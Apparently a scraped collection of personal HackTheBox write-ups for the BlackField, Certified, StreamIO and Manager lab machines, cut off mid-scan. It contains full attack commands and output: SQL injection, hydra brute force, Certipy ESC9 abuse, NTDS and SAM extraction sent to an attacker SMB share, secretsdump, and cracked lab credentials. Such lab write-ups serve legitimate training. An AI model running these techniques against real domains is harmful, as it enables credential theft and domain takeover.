BLACKFIELD160820 BLACKFIELD385928 BLACKFIELD848660 BLACKFIELD682842 BLACKFIELD813266 BLACKFIELD274577 BLACKFIELD448641 BLACKFIELD318077 BLACKFIELD289513 BLACKFIELD336573 BLACKFIELD962495 BLACKFIELD566117 BLACKFIELD617630 BLACKFIELD717683 BLACKFIELD390192 BLACKFIELD652779 BLACKFIELD665997 BLACKFIELD998321 BLACKFIELD946509 BLACKFIELD228442 BLACKFIELD548464 BLACKFIELD586592 BLACKFIELD512331 BLACKFIELD609423 BLACKFIELD395725 BLACKFIELD438923 BLACKFIELD691480 BLACKFIELD236467 BLACKFIELD895235 BLACKFIELD788523 BLACKFIELD710285 BLACKFIELD357023 BLACKFIELD362337 BLACKFIELD651599 BLACKFIELD579344 BLACKFIELD859776 BLACKFIELD789969 BLACKFIELD356727 BLACKFIELD962999 BLACKFIELD201655 BLACKFIELD635996 BLACKFIELD478410 BLACKFIELD518316 BLACKFIELD202900 BLACKFIELD767498 BLACKFIELD103974 BLACKFIELD135403 BLACKFIELD112766 BLACKFIELD978938 BLACKFIELD871753 BLACKFIELD136203 BLACKFIELD634593 BLACKFIELD274367 BLACKFIELD520852 BLACKFIELD339143 BLACKFIELD684814 BLACKFIELD792484 BLACKFIELD802875 BLACKFIELD383108 BLACKFIELD318250 BLACKFIELD496547 BLACKFIELD219914 BLACKFIELD454313 BLACKFIELD460131 BLACKFIELD613771 BLACKFIELD632329 BLACKFIELD402639 BLACKFIELD235930 BLACKFIELD246388 BLACKFIELD946435 BLACKFIELD739227 BLACKFIELD827906 BLACKFIELD198927 BLACKFIELD169876 BLACKFIELD150357 BLACKFIELD594619 BLACKFIELD274109 BLACKFIELD682949 BLACKFIELD316850 BLACKFIELD884808 BLACKFIELD327610 BLACKFIELD899238 BLACKFIELD184493 BLACKFIELD631162 BLACKFIELD591846 BLACKFIELD896715 BLACKFIELD500073 BLACKFIELD584113 BLACKFIELD204805 BLACKFIELD842593 BLACKFIELD397679 BLACKFIELD842438 BLACKFIELD286615 BLACKFIELD224839 BLACKFIELD631599 BLACKFIELD247450 BLACKFIELD290582 BLACKFIELD657263 BLACKFIELD314351 BLACKFIELD434395 BLACKFIELD410243 BLACKFIELD307633 BLACKFIELD758945 BLACKFIELD541148 BLACKFIELD532412 BLACKFIELD996878 BLACKFIELD653097 BLACKFIELD438814 svc_backup lydericlefebvre PC01$ PC02$ PC03$ PC04$ PC05$ PC06$ PC07$ PC08$ PC09$ PC10$ PC11$ PC12$ PC13$ SRV-WEB$ SRV-FILE$ SRV-EXCHANGE$ SRV-INTRANET$ lets roast 
them\nwe got support@blackfield.local\nlet's crack it\nso we have #00^BlackKnight as the password for the support account\nlet's check for password reuse while we enumerate the smb server\nSMB # we find a buuuunch of profiles\ndrw-rw-rw- 0 Wed Jun 3 12:47:11 2020 AAlleni drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABarteski drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABekesz drw-rw-rw- 0 Wed Jun 3 12:47:11 2020 ABenzies drw-rw-rw- 0 Wed Ju...... let's check for cred reuse\nnone of them were reusing, please don't be another case of same user same pass, I'm going to check the bloodhound file I gathered first\nExploitation # ok so support can change the password of audit, we will change it and access that forensics share we saw earlier\nwith\n└─$ net rpc password \u0026#34;audit2020\u0026#34; \u0026#34;Password@123\u0026#34; -U \u0026#34;blackfield.local.htb\u0026#34;/\u0026#34;support\u0026#34;%\u0026#34;#00^BlackKnight\u0026#34; -S \u0026#34;blackfield.local\u0026#34; now let's access the share with audit2020:Password@123\nwe have these two members\nso we have another admin called Ipwn3dyourcompany interesting\ngot these hashes when we used pypykatz to see the dump content for lsass\n== MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000 Username: Administrator Domain: BLACKFIELD LM: NA NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368 DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000 I passed the hashes and got svc on winrm\nwe can try dumping secrets\nSEBackupPrivilege # On kali create a file called viper.dsh\nwith the content\nset context persistent nowriters add volume c: alias viper create expose %viper% x: unix2dos viper.dsh\ncd c:\\windows\\tasks\npowershell -c iwr -Uri http://10.10.10.10/viper.dsh -OutFile viper.dsh or set up an smb share, set it up anyway\nimpacket-smbserver share ./ 
-smb2support -user test -pass \u0026#39;\u0026#39; and then\ndiskshadow /s viper.dsh robocopy /b x:\\windows\\ntds . ntds.dit reg save hklm\\system c:\\windows\\tasks\\system reg save hklm\\sam c:\\windows\\tasks\\sam net use \\\\10.10.10.10\\share /user:test copy sam, ntds.dit, system \\\\10.10.10.10\\share and now finally dump it\nimpacket-secretsdump -ntds ntds.dit -system system -sam sam local | tee dmp.txt and we have the Administrator hash\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654a let's PTH with this and grab flag\n","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/blackfield/","section":"CTF Writeups","summary":"","title":"BlackField","type":"ctf-writeups"},{"content":" Certified # Overview # OS: Windows IP: 10.129.231.186 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # got into management_svc by abusing writeowner and genericall, and then exploited ESC9 vuln.\nLoot # Loot Category Details Usernames judith.mader Passwords judith09 Usernames+Passwords Username: judith.mader Password: judith09 Hashes Service Versions Enumeration # Username: judith.mader Password: judith09\nNmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 12:34 EST Nmap scan report for 10.129.231.186 Host is up (0.11s latency). 
Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-07 00:35:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 |_ssl-date: 2026-03-07T00:36:36+00:00; +7h00m01s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-07T00:36:35+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:05:29 |_Not valid after: 2105-05-23T21:05:29 |_ssl-date: 2026-03-07T00:36:35+00:00; +7h00m01s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AB1059%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-07T00:35:56 |_ start_date: N/A |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 114.93 ms 10.10.14.1 2 115.38 ms 10.129.231.186 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds Roasting # I validated this step using the evidence below before moving forward in the chain.\nSMB 10.129.231.186 445 DC01 [+] certified.htb\\judith.mader:judith09 SMB 10.129.231.186 445 DC01 -Username- -Last PW Set- -BadPW- -Description- SMB 10.129.231.186 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain SMB 10.129.231.186 445 DC01 Guest \u0026lt;never\u0026gt; 0 Built-in account for guest access to the computer/domain SMB 10.129.231.186 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account SMB 10.129.231.186 445 DC01 judith.mader 2024-05-14 19:22:11 0 SMB 10.129.231.186 445 DC01 management_svc 2024-05-13 15:30:51 0 SMB 10.129.231.186 445 DC01 ca_operator 2024-05-13 15:32:03 0 SMB 10.129.231.186 445 DC01 alexander.huges 2024-05-14 16:39:08 0 SMB 10.129.231.186 445 DC01 harry.wilson 2024-05-14 16:39:37 0 SMB 10.129.231.186 445 DC01 gregory.cameron 2024-05-14 16:40:05 0 SMB 10.129.231.186 445 DC01 [*] Enumerated 9 local users: CERTIFIED lets try kerberoasting\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation --------------------------------- -------------- ------------------------------------------ -------------------------- --------- ---------- certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 \u0026lt;never\u0026gt; [-] CCache file is not found. Skipping... 
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$287b2c4e4872bb1c70618d14029a15bd$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 let's crack this\ncan't seem to crack it\nlet's check for cred reuse\nand nothing there either\nExploitation # alright so judith has writeowner over this user let's abuse it\nok so the path is clear, we add ourselves to the group and then grab management_svc\ngreat now we can go forth\nCertipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user \u0026#39;management_svc\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; [*] Adding Key Credential with device ID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;0097fa33-afa9-37f8-d31b-18340254044d\u0026#39; to the Key Credentials for \u0026#39;management_svc\u0026#39; /home/kali/.local/lib/python3.13/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn\u0026#39;t positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography. return x509.load_der_x509_certificate(certificate) [*] Authenticating as \u0026#39;management_svc\u0026#39; with the certificate [*] Using principal: management_svc@certified.htb [*] Trying to get TGT... 
[*] Got TGT [*] Saved credential cache to \u0026#39;management_svc.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;management_svc\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;management_svc\u0026#39; [*] NT hash for \u0026#39;management_svc\u0026#39;: a091c1832bcdd4677c28b5a6a1295584 we got the nt hash for management wee\nI have generic all over ca operator\nlet's abuse this as well\n─(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Targeting user \u0026#39;ca_operator\u0026#39; [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; [*] Adding Key Credential with device ID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; to the Key Credentials for \u0026#39;ca_operator\u0026#39; [*] Successfully added Key Credential with device ID \u0026#39;735e05fe-c1c8-f829-69a9-ac18e2df0b13\u0026#39; to the Key Credentials for \u0026#39;ca_operator\u0026#39; /home/kali/.local/lib/python3.13/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn\u0026#39;t positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography. return x509.load_der_x509_certificate(certificate) [*] Authenticating as \u0026#39;ca_operator\u0026#39; with the certificate [*] Using principal: ca_operator@certified.htb [*] Trying to get TGT... 
[*] Got TGT [*] Saved credential cache to \u0026#39;ca_operator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;ca_operator\u0026#39; [*] Restoring the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] Successfully restored the old Key Credentials for \u0026#39;ca_operator\u0026#39; [*] NT hash for \u0026#39;ca_operator\u0026#39;: b4b86f45c6018f1b664f70805f45d8f2 and we have this boom\n┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy-ad account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : Administrator [*] Successfully updated \u0026#39;ca_operator\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error: The NETBIOS connection with the remote host timed out. 
[-] Use -debug to print a stacktrace ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy-ad req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 6 [*] Got certificate with UPN \u0026#39;Administrator\u0026#39; [*] Certificate has no object SID [*] Saved certificate and private key to \u0026#39;administrator.pfx\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -dc-ip 10.129.231.186 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user \u0026#39;ca_operator\u0026#39;: userPrincipalName : ca_operator@certified.htb [*] Successfully updated \u0026#39;ca_operator\u0026#39; ┌──(kali㉿kali)-[~/Desktop/Boxes/Certified] └─$ certipy auth -pfx administrator.pfx -dc-ip 10.129.231.186 -domain certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@certified.htb [*] Trying to get TGT... 
[*] Got TGT [*] Saved credential cache to \u0026#39;administrator.ccache\u0026#39; [*] Trying to retrieve NT hash for \u0026#39;administrator\u0026#39; [*] Got hash for \u0026#39;administrator@certified.htb\u0026#39;: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 ","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/certified/","section":"CTF Writeups","summary":"","title":"Certified","type":"ctf-writeups"},{"content":"","date":"6 March 2026","externalUrl":null,"permalink":"/tags/medium/","section":"Tags","summary":"","title":"Medium","type":"tags"},{"content":" StreamIO # Overview # OS: Windows IP: 10.129.1.27 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for StreamIO, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Barry Oliver Samantha Johan | | Passwords | | | Usernames+Passwords | | | Hashes | | | Service Versions | |\nEnumeration # Nmap # ─$ nmap 10.129.1.27 -sCV -A -Pn -p- --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 05:07 EST Nmap scan report for 10.129.1.27 Host is up (0.11s latency). 
Not shown: 65516 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-06 17:07:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: 2026-03-06T17:09:29+00:00; +6h59m59s from scanner time. |_http-title: Not Found | ssl-cert: Subject: commonName=streamIO/countryName=EU | Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb | Not valid before: 2022-02-22T07:03:28 |_Not valid after: 2022-03-24T07:03:28 | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AAA788%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m57s | smb2-time: | date: 2026-03-06T17:08:50 |_ start_date: N/A TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 114.53 ms 10.10.14.1 2 114.69 ms 10.129.1.27 OS and Service detection performed. 
Please report any incorrec Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe got Barry,Oliver,Samantha\nfound this with dirbusting\nand this\nExploitation # I'm not good at sqli at all so I'm gonna follow ippsec's tutorial on this\nlet's use this query\nabcd\u0026#39; union select 1,concat(username,\u0026#39;:\u0026#39;,password),3,4,5,6 from users;-- - we get these hashes\nadmin :665a50ac9eaa781e4f7f04199db97a11 Alexendra :1c2b3d8270321140e5153f6637d3ee53 Austin :0049ac57646627b8d7aeaccf8b6a936f Barbra :3961548825e3e21df5646cafe11c6c76 Barry :54c88b2dbd7b1a84012fabc1a4c73415 $/opt/hashcat-6.2.5/hashcat.bin user-passwords /usr/share/wordlists/rockyou.txt --user -m 0 ...[snip]... $/opt/hashcat-6.2.5/hashcat.bin user-passwords /usr/share/wordlists/rockyou.txt --user -m 0 --show admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$ Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara dfdfdf:ae27a4b4821b13cad2a17a75d219853e:dfdfdf Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8! yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. 
let's bruteforce that login page with hydra now\nhydra -C userpass streamio.htb https-post-form \u0026quot;/login.php:username=^USER^\u0026amp;password=^PASS^:F=failed\u0026quot;\nyoshihide works with 66boysandgirls..\nreferring to 0xdf's blog we are able to get rce after parameter fuzzing to find a parameter called debug, which we passed master.php to and used a php filter to retrieve contents of\nwe find this in search.php\n## Query section $connection = array(\u0026#34;Database\u0026#34;=\u0026gt;\u0026#34;STREAMIO\u0026#34;, \u0026#34;UID\u0026#34; =\u0026gt; \u0026#34;db_user\u0026#34;, \u0026#34;PWD\u0026#34; =\u0026gt; \u0026#39;B1@hB1@hB1@h\u0026#39;); $handle = sqlsrv_connect(\u0026#39;(local)\u0026#39;,$connection); if (!isset($_POST[\u0026#39;q\u0026#39;])) and db admin creds in register.php\nlet's use those\nsqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select table_name from streamio_backup.information_schema.tables;\u0026#34; and we find this\nPS C:\\\u0026gt; sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select * from users;\u0026#34; sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q \u0026#34;select * from users;\u0026#34; id username password ----------- -------------------------------------------------- -------------------------------------------------- 1 nikk37 389d14cb8e4e9b94b137deb1caf0612a 2 yoshihide b779ba15cedfd22a023c4d8bcf5f2332 3 James c660060492d9edcaa8332d89c99c9239 4 Theodore 925e5408ecb67aea449373d668b7359e 5 Samantha 083ffae904143c4796e464dac33c1f7d 6 Lauren 08344b85b329d7efd611b7a7743e8a09 7 William d62be0dc82071bccc1322d64ec5b6c51 8 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5 on cracking\n/opt/hashcat-6.2.5/hashcat.bin user-passwords-backup /usr/share/wordlists/rockyou.txt -m0 --user --show nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. 
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ lets winrm now\nevil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' finding a firefox profile\n*Evil-WinRM* PS C:\\Users\\nikk37\\AppData\\roaming\\mozilla\\Firefox\\Profiles> ls Directory: C:\\Users\\nikk37\\AppData\\roaming\\mozilla\\Firefox\\Profiles Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/22/2022 2:40 AM 5rwivk2l.default d----- 2/22/2022 2:42 AM br53rxeg.default-release download key4.db download logins.json python /opt/firepwd/firepwd.py ...[snip]... decrypting login/password pairs https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r' https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)' https://slack.streamio.htb:b'yoshihide',b'paddpadd@12' https://slack.streamio.htb:b'JDgodd',b'password@12' ","date":"6 March 2026","externalUrl":null,"permalink":"/ctf-writeups/streamio/","section":"CTF Writeups","summary":"","title":"StreamIO","type":"ctf-writeups"},{"content":" Manager # Overview # OS: Windows IP: 10.129.16.174 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got creds, found a backup file via the MSSQL instance, got raven's password, RDP'd as raven and found a certificate that was vulnerable.\nLoot # | Loot Category | Details |\n| --- | --- |\n| Usernames | operator raven |\n| Passwords | operator R4v3nBe5tD3veloP3r!123 |\n| Usernames+Passwords | operator:operator |\n| Hashes | |\n| Service Versions | |\nEnumeration # Nmap # nmap 10.129.16.174 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-05 16:05 EST Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 9.09% done; ETC: 16:06 (0:01:00 
remaining) Nmap scan report for manager.htb (10.129.16.174) Host is up (0.11s latency). Not shown: 65513 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Manager | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-05 21:16:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.129.16.174:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2026-03-05T19:42:03 |_Not valid after: 2056-03-05T19:42:03 | ms-sql-ntlm-info: | 10.129.16.174:1433: | Target_Name: MANAGER | NetBIOS_Domain_Name: MANAGER | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: manager.htb | DNS_Computer_Name: dc01.manager.htb | DNS_Tree_Name: manager.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-05T21:18:08+00:00; +10m46s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.manager.htb | Not valid before: 2024-08-30T17:08:51 |_Not valid after: 2122-07-27T10:31:04 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49694/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 49728/tcp open msrpc Microsoft Windows RPC 49794/tcp open msrpc Microsoft Windows RPC 60102/tcp open unknown 1 service unrecognized despite returning data. 
